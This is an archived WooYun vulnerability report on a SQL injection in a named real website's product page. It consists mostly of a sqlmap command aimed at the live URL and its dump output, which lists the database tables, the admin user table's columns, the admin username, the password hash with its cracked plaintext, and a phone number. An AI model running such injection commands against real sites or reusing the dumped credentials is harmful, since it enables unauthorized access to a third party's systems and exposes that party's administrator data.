乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-12: 厂商已经主动忽略漏洞,细节向公众公开
冷白开也要谈恋爱~~妹子快来
sqlmap.py -u "http://www.yueyueshu.com/product.php?catid=2" --dbs
相关数据
available databases [2]:[*] information_schema[*] yysdateDatabase: yysdate[14 tables]+--------------------+| eninfo_board || eninfo_category || eninfo_content || eninfo_wenda || enproduct_category || enproduct_content || info_board || info_category || info_content || info_wenda || manager_role || manager_users || product_category || product_content |+--------------------+Database: yysdateTable: manager_users[16 columns]+-----------+--------------+| Column | Type |+-----------+--------------+| address | varchar(250) || city | varchar(50) || country | varchar(50) || EmailName | varchar(50) || id | int(11) || is_verify | tinyint(4) || moblie | varchar(50) || phone | varchar(200) || province | varchar(50) || psw | varchar(50) || regtime | datetime || sex | tinyint(1) || truename | varchar(200) || UserGrade | int(4) || username | varchar(255) || zip | varchar(50) |+-----------+--------------+Database: yysdateTable: manager_users[1 entry]+----------+| username |+----------+| admin |+----------+Database: yysdateTable: manager_users[1 entry]+----------------------------------+| psw |+----------------------------------+| 0192023a7bbd73250516f069df18b500 |明文:admin123+----------------------------------+Database: yysdateTable: manager_users[1 entry]+----------+| phone |+----------+| 57163850 |+----------+Database: yysdateTable: manager_users[1 entry]+-----------+| EmailName |+-----------+| [email protected] |+-----------+
综上
你们懂
未能联系到厂商或者厂商积极拒绝